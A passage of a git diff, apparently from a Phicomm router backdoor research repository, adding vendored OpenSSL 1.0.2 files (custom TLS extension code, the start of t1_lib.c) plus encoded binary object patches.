z|5Fa4?Tqi#)i!3kRgQY6eW9PsAyy-h_paidcva=$Q%SKXwi>M$Je_f!`eugZh|s9E
z`*V!iPCo~4L4%Iy`SLsc0}i2GJN9$njc5?h{Qj%$@#*h6yyW-S@v)Hq?6}_Qb<*xk
z{xbnTr@tNk3XUzhP!dBKq{*Ssae_q3?@uu-PedT-M~;bd7YWBozW!)?Sg8M&8>~(#
K)|Z<3{r?9oQ-mo1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_ext.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_ext.c
new file mode 100644
index 0000000..724ddf7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_ext.c
@@ -0,0 +1,298 @@
+/* ssl/t1_ext.c */
+/* ====================================================================
+ * Copyright (c) 2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* Custom extension utility functions */
+
+#include "ssl_locl.h"
+
+#ifndef OPENSSL_NO_TLSEXT
+
+/* Find a custom extension from the list. */
+static custom_ext_method *custom_ext_find(custom_ext_methods *exts,
+                                          unsigned int ext_type)
+{
+    size_t i;
+    custom_ext_method *meth = exts->meths;
+    for (i = 0; i < exts->meths_count; i++, meth++) {
+        if (ext_type == meth->ext_type)
+            return meth;
+    }
+    return NULL;
+}
+
+/*
+ * Initialise custom extensions flags to indicate neither sent nor received.
+ */
+void custom_ext_init(custom_ext_methods *exts)
+{
+    size_t i;
+    custom_ext_method *meth = exts->meths;
+    for (i = 0; i < exts->meths_count; i++, meth++)
+        meth->ext_flags = 0;
+}
+
+/* Pass received custom extension data to the application for parsing. */
+int custom_ext_parse(SSL *s, int server,
+                     unsigned int ext_type,
+                     const unsigned char *ext_data, size_t ext_size, int *al)
+{
+    custom_ext_methods *exts = server ? &s->cert->srv_ext : &s->cert->cli_ext;
+    custom_ext_method *meth;
+    meth = custom_ext_find(exts, ext_type);
+    /* If not found return success */
+    if (!meth)
+        return 1;
+    if (!server) {
+        /*
+         * If it's ServerHello we can't have any extensions not sent in
+         * ClientHello.
+         */
+        if (!(meth->ext_flags & SSL_EXT_FLAG_SENT)) {
+            *al = TLS1_AD_UNSUPPORTED_EXTENSION;
+            return 0;
+        }
+    }
+    /* If already present it's a duplicate */
+    if (meth->ext_flags & SSL_EXT_FLAG_RECEIVED) {
+        *al = TLS1_AD_DECODE_ERROR;
+        return 0;
+    }
+    meth->ext_flags |= SSL_EXT_FLAG_RECEIVED;
+    /* If no parse function set return success */
+    if (!meth->parse_cb)
+        return 1;
+
+    return meth->parse_cb(s, ext_type, ext_data, ext_size, al,
+                          meth->parse_arg);
+}
+
+/*
+ * Request custom extension data from the application and add to the return
+ * buffer.
+ */
+int custom_ext_add(SSL *s, int server,
+                   unsigned char **pret, unsigned char *limit, int *al)
+{
+    custom_ext_methods *exts = server ? &s->cert->srv_ext : &s->cert->cli_ext;
+    custom_ext_method *meth;
+    unsigned char *ret = *pret;
+    size_t i;
+
+    for (i = 0; i < exts->meths_count; i++) {
+        const unsigned char *out = NULL;
+        size_t outlen = 0;
+        meth = exts->meths + i;
+
+        if (server) {
+            /*
+             * For ServerHello only send extensions present in ClientHello.
+             */
+            if (!(meth->ext_flags & SSL_EXT_FLAG_RECEIVED))
+                continue;
+            /* If callback absent for server skip it */
+            if (!meth->add_cb)
+                continue;
+        }
+        if (meth->add_cb) {
+            int cb_retval = 0;
+            cb_retval = meth->add_cb(s, meth->ext_type,
+                                     &out, &outlen, al, meth->add_arg);
+            if (cb_retval < 0)
+                return 0;       /* error */
+            if (cb_retval == 0)
+                continue;       /* skip this extension */
+        }
+        if (4 > limit - ret || outlen > (size_t)(limit - ret - 4))
+            return 0;
+        s2n(meth->ext_type, ret);
+        s2n(outlen, ret);
+        if (outlen) {
+            memcpy(ret, out, outlen);
+            ret += outlen;
+        }
+        /*
+         * We can't send duplicates: code logic should prevent this.
+         */
+        OPENSSL_assert(!(meth->ext_flags & SSL_EXT_FLAG_SENT));
+        /*
+         * Indicate extension has been sent: this is both a sanity check to
+         * ensure we don't send duplicate extensions and indicates that it is
+         * not an error if the extension is present in ServerHello.
+         */
+        meth->ext_flags |= SSL_EXT_FLAG_SENT;
+        if (meth->free_cb)
+            meth->free_cb(s, meth->ext_type, out, meth->add_arg);
+    }
+    *pret = ret;
+    return 1;
+}
+
+/* Copy table of custom extensions */
+int custom_exts_copy(custom_ext_methods *dst, const custom_ext_methods *src)
+{
+    if (src->meths_count) {
+        dst->meths =
+            BUF_memdup(src->meths,
+                       sizeof(custom_ext_method) * src->meths_count);
+        if (dst->meths == NULL)
+            return 0;
+        dst->meths_count = src->meths_count;
+    }
+    return 1;
+}
+
+void custom_exts_free(custom_ext_methods *exts)
+{
+    if (exts->meths)
+        OPENSSL_free(exts->meths);
+}
+
+/* Set callbacks for a custom extension. */
+static int custom_ext_meth_add(custom_ext_methods *exts,
+                               unsigned int ext_type,
+                               custom_ext_add_cb add_cb,
+                               custom_ext_free_cb free_cb,
+                               void *add_arg,
+                               custom_ext_parse_cb parse_cb, void *parse_arg)
+{
+    custom_ext_method *meth;
+    /*
+     * Check application error: if add_cb is not set free_cb will never be
+     * called.
+     */
+    if (!add_cb && free_cb)
+        return 0;
+    /* Don't add if extension supported internally. */
+    if (SSL_extension_supported(ext_type))
+        return 0;
+    /* Extension type must fit in 16 bits */
+    if (ext_type > 0xffff)
+        return 0;
+    /* Search for duplicate */
+    if (custom_ext_find(exts, ext_type))
+        return 0;
+    exts->meths = OPENSSL_realloc(exts->meths,
+                                  (exts->meths_count +
+                                   1) * sizeof(custom_ext_method));
+
+    if (!exts->meths) {
+        exts->meths_count = 0;
+        return 0;
+    }
+
+    meth = exts->meths + exts->meths_count;
+    memset(meth, 0, sizeof(custom_ext_method));
+    meth->parse_cb = parse_cb;
+    meth->add_cb = add_cb;
+    meth->free_cb = free_cb;
+    meth->ext_type = ext_type;
+    meth->add_arg = add_arg;
+    meth->parse_arg = parse_arg;
+    exts->meths_count++;
+    return 1;
+}
+
+/* Application level functions to add custom extension callbacks */
+int SSL_CTX_add_client_custom_ext(SSL_CTX *ctx, unsigned int ext_type,
+                                  custom_ext_add_cb add_cb,
+                                  custom_ext_free_cb free_cb,
+                                  void *add_arg,
+                                  custom_ext_parse_cb parse_cb,
+                                  void *parse_arg)
+{
+    return custom_ext_meth_add(&ctx->cert->cli_ext, ext_type,
+                               add_cb, free_cb, add_arg, parse_cb, parse_arg);
+}
+
+int SSL_CTX_add_server_custom_ext(SSL_CTX *ctx, unsigned int ext_type,
+                                  custom_ext_add_cb add_cb,
+                                  custom_ext_free_cb free_cb,
+                                  void *add_arg,
+                                  custom_ext_parse_cb parse_cb,
+                                  void *parse_arg)
+{
+    return custom_ext_meth_add(&ctx->cert->srv_ext, ext_type,
+                               add_cb, free_cb, add_arg, parse_cb, parse_arg);
+}
+
+int SSL_extension_supported(unsigned int ext_type)
+{
+    switch (ext_type) {
+        /* Internally supported extensions. */
+    case TLSEXT_TYPE_application_layer_protocol_negotiation:
+    case TLSEXT_TYPE_ec_point_formats:
+    case TLSEXT_TYPE_elliptic_curves:
+    case TLSEXT_TYPE_heartbeat:
+    case TLSEXT_TYPE_next_proto_neg:
+    case TLSEXT_TYPE_padding:
+    case TLSEXT_TYPE_renegotiate:
+    case TLSEXT_TYPE_server_name:
+    case TLSEXT_TYPE_session_ticket:
+    case TLSEXT_TYPE_signature_algorithms:
+    case TLSEXT_TYPE_srp:
+    case TLSEXT_TYPE_status_request:
+    case TLSEXT_TYPE_use_srtp:
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    case TLSEXT_TYPE_opaque_prf_input:
+# endif
+# ifdef TLSEXT_TYPE_encrypt_then_mac
+    case TLSEXT_TYPE_encrypt_then_mac:
+# endif
+        return 1;
+    default:
+        return 0;
+    }
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_ext.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_ext.o
new file mode 100644
index 0000000000000000000000000000000000000000..5c77872272a5832b5400461dc4e40d4579881ce4
GIT binary patch
literal 3992
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
W?^3Nhb1DDBIIuuJY_s`axBoXJSIn0H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_lib.c
new file mode 100644
index 0000000..72be01d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_lib.c
@@ -0,0 +1,4356 @@
+/* ssl/t1_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/hmac.h>
+#ifdef OPENSSL_NO_EC2M
+# include <openssl/ec.h>
+#endif
+#include <openssl/ocsp.h>
+#include <openssl/rand.h>
+#include "ssl_locl.h"
+
+const char tls1_version_str[] = "TLSv1" OPENSSL_VERSION_PTEXT;
+
+#ifndef OPENSSL_NO_TLSEXT
+static int tls_decrypt_ticket(SSL *s, const unsigned char *tick, int ticklen,
+                              const unsigned char *sess_id, int sesslen,
+                              SSL_SESSION **psess);
+static int ssl_check_clienthello_tlsext_early(SSL *s);
+int ssl_check_serverhello_tlsext(SSL *s);
+#endif
+
+SSL3_ENC_METHOD TLSv1_enc_data = {
+    tls1_enc,
+    tls1_mac,
+    tls1_setup_key_block,
+    tls1_generate_master_secret,
+    tls1_change_cipher_state,
+    tls1_final_finish_mac,
+    TLS1_FINISH_MAC_LENGTH,
+    tls1_cert_verify_mac,
+    TLS_MD_CLIENT_FINISH_CONST, TLS_MD_CLIENT_FINISH_CONST_SIZE,
+    TLS_MD_SERVER_FINISH_CONST, TLS_MD_SERVER_FINISH_CONST_SIZE,
+    tls1_alert_code,
+    tls1_export_keying_material,
+    0,
+    SSL3_HM_HEADER_LENGTH,
+    ssl3_set_handshake_header,
+    ssl3_handshake_write
+};
+
+SSL3_ENC_METHOD TLSv1_1_enc_data = {
+    tls1_enc,
+    tls1_mac,
+    tls1_setup_key_block,
+    tls1_generate_master_secret,
+    tls1_change_cipher_state,
+    tls1_final_finish_mac,
+    TLS1_FINISH_MAC_LENGTH,
+    tls1_cert_verify_mac,
+    TLS_MD_CLIENT_FINISH_CONST, TLS_MD_CLIENT_FINISH_CONST_SIZE,
+    TLS_MD_SERVER_FINISH_CONST, TLS_MD_SERVER_FINISH_CONST_SIZE,
+    tls1_alert_code,
+    tls1_export_keying_material,
+    SSL_ENC_FLAG_EXPLICIT_IV,
+    SSL3_HM_HEADER_LENGTH,
+    ssl3_set_handshake_header,
+    ssl3_handshake_write
+};
+
+SSL3_ENC_METHOD TLSv1_2_enc_data = {
+    tls1_enc,
+    tls1_mac,
+    tls1_setup_key_block,
+    tls1_generate_master_secret,
+    tls1_change_cipher_state,
+    tls1_final_finish_mac,
+    TLS1_FINISH_MAC_LENGTH,
+    tls1_cert_verify_mac,
+    TLS_MD_CLIENT_FINISH_CONST, TLS_MD_CLIENT_FINISH_CONST_SIZE,
+    TLS_MD_SERVER_FINISH_CONST, TLS_MD_SERVER_FINISH_CONST_SIZE,
+    tls1_alert_code,
+    tls1_export_keying_material,
+    SSL_ENC_FLAG_EXPLICIT_IV | SSL_ENC_FLAG_SIGALGS | SSL_ENC_FLAG_SHA256_PRF
+        | SSL_ENC_FLAG_TLS1_2_CIPHERS,
+    SSL3_HM_HEADER_LENGTH,
+    ssl3_set_handshake_header,
+    ssl3_handshake_write
+};
+
+long tls1_default_timeout(void)
+{
+    /*
+     * 2 hours, the 24 hours mentioned in the TLSv1 spec is way too long for
+     * http, the cache would over fill
+     */
+    return (60 * 60 * 2);
+}
+
+int tls1_new(SSL *s)
+{
+    if (!ssl3_new(s))
+        return (0);
+    s->method->ssl_clear(s);
+    return (1);
+}
+
+void tls1_free(SSL *s)
+{
+#ifndef OPENSSL_NO_TLSEXT
+    if (s->tlsext_session_ticket) {
+        OPENSSL_free(s->tlsext_session_ticket);
+    }
+#endif                          /* OPENSSL_NO_TLSEXT */
+    ssl3_free(s);
+}
+
+void tls1_clear(SSL *s)
+{
+    ssl3_clear(s);
+    s->version = s->method->version;
+}
+
+#ifndef OPENSSL_NO_EC
+
+static int nid_list[] = {
+    NID_sect163k1,              /* sect163k1 (1) */
+    NID_sect163r1,              /* sect163r1 (2) */
+    NID_sect163r2,              /* sect163r2 (3) */
+    NID_sect193r1,              /* sect193r1 (4) */
+    NID_sect193r2,              /* sect193r2 (5) */
+    NID_sect233k1,              /* sect233k1 (6) */
+    NID_sect233r1,              /* sect233r1 (7) */
+    NID_sect239k1,              /* sect239k1 (8) */
+    NID_sect283k1,              /* sect283k1 (9) */
+    NID_sect283r1,              /* sect283r1 (10) */
+    NID_sect409k1,              /* sect409k1 (11) */
+    NID_sect409r1,              /* sect409r1 (12) */
+    NID_sect571k1,              /* sect571k1 (13) */
+    NID_sect571r1,              /* sect571r1 (14) */
+    NID_secp160k1,              /* secp160k1 (15) */
+    NID_secp160r1,              /* secp160r1 (16) */
+    NID_secp160r2,              /* secp160r2 (17) */
+    NID_secp192k1,              /* secp192k1 (18) */
+    NID_X9_62_prime192v1,       /* secp192r1 (19) */
+    NID_secp224k1,              /* secp224k1 (20) */
+    NID_secp224r1,              /* secp224r1 (21) */
+    NID_secp256k1,              /* secp256k1 (22) */
+    NID_X9_62_prime256v1,       /* secp256r1 (23) */
+    NID_secp384r1,              /* secp384r1 (24) */
+    NID_secp521r1,              /* secp521r1 (25) */
+    NID_brainpoolP256r1,        /* brainpoolP256r1 (26) */
+    NID_brainpoolP384r1,        /* brainpoolP384r1 (27) */
+    NID_brainpoolP512r1         /* brainpool512r1 (28) */
+};
+
+static const unsigned char ecformats_default[] = {
+    TLSEXT_ECPOINTFORMAT_uncompressed,
+    TLSEXT_ECPOINTFORMAT_ansiX962_compressed_prime,
+    TLSEXT_ECPOINTFORMAT_ansiX962_compressed_char2
+};
+
+static const unsigned char eccurves_default[] = {
+# ifndef OPENSSL_NO_EC2M
+    0, 14,                      /* sect571r1 (14) */
+    0, 13,                      /* sect571k1 (13) */
+# endif
+    0, 25,                      /* secp521r1 (25) */
+    0, 28,                      /* brainpool512r1 (28) */
+# ifndef OPENSSL_NO_EC2M
+    0, 11,                      /* sect409k1 (11) */
+    0, 12,                      /* sect409r1 (12) */
+# endif
+    0, 27,                      /* brainpoolP384r1 (27) */
+    0, 24,                      /* secp384r1 (24) */
+# ifndef OPENSSL_NO_EC2M
+    0, 9,                       /* sect283k1 (9) */
+    0, 10,                      /* sect283r1 (10) */
+# endif
+    0, 26,                      /* brainpoolP256r1 (26) */
+    0, 22,                      /* secp256k1 (22) */
+    0, 23,                      /* secp256r1 (23) */
+# ifndef OPENSSL_NO_EC2M
+    0, 8,                       /* sect239k1 (8) */
+    0, 6,                       /* sect233k1 (6) */
+    0, 7,                       /* sect233r1 (7) */
+# endif
+    0, 20,                      /* secp224k1 (20) */
+    0, 21,                      /* secp224r1 (21) */
+# ifndef OPENSSL_NO_EC2M
+    0, 4,                       /* sect193r1 (4) */
+    0, 5,                       /* sect193r2 (5) */
+# endif
+    0, 18,                      /* secp192k1 (18) */
+    0, 19,                      /* secp192r1 (19) */
+# ifndef OPENSSL_NO_EC2M
+    0, 1,                       /* sect163k1 (1) */
+    0, 2,                       /* sect163r1 (2) */
+    0, 3,                       /* sect163r2 (3) */
+# endif
+    0, 15,                      /* secp160k1 (15) */
+    0, 16,                      /* secp160r1 (16) */
+    0, 17,                      /* secp160r2 (17) */
+};
+
+static const unsigned char suiteb_curves[] = {
+    0, TLSEXT_curve_P_256,
+    0, TLSEXT_curve_P_384
+};
+
+# ifdef OPENSSL_FIPS
+/* Brainpool not allowed in FIPS mode */
+static const unsigned char fips_curves_default[] = {
+#  ifndef OPENSSL_NO_EC2M
+    0, 14,                      /* sect571r1 (14) */
+    0, 13,                      /* sect571k1 (13) */
+#  endif
+    0, 25,                      /* secp521r1 (25) */
+#  ifndef OPENSSL_NO_EC2M
+    0, 11,                      /* sect409k1 (11) */
+    0, 12,                      /* sect409r1 (12) */
+#  endif
+    0, 24,                      /* secp384r1 (24) */
+#  ifndef OPENSSL_NO_EC2M
+    0, 9,                       /* sect283k1 (9) */
+    0, 10,                      /* sect283r1 (10) */
+#  endif
+    0, 22,                      /* secp256k1 (22) */
+    0, 23,                      /* secp256r1 (23) */
+#  ifndef OPENSSL_NO_EC2M
+    0, 8,                       /* sect239k1 (8) */
+    0, 6,                       /* sect233k1 (6) */
+    0, 7,                       /* sect233r1 (7) */
+#  endif
+    0, 20,                      /* secp224k1 (20) */
+    0, 21,                      /* secp224r1 (21) */
+#  ifndef OPENSSL_NO_EC2M
+    0, 4,                       /* sect193r1 (4) */
+    0, 5,                       /* sect193r2 (5) */
+#  endif
+    0, 18,                      /* secp192k1 (18) */
+    0, 19,                      /* secp192r1 (19) */
+#  ifndef OPENSSL_NO_EC2M
+    0, 1,                       /* sect163k1 (1) */
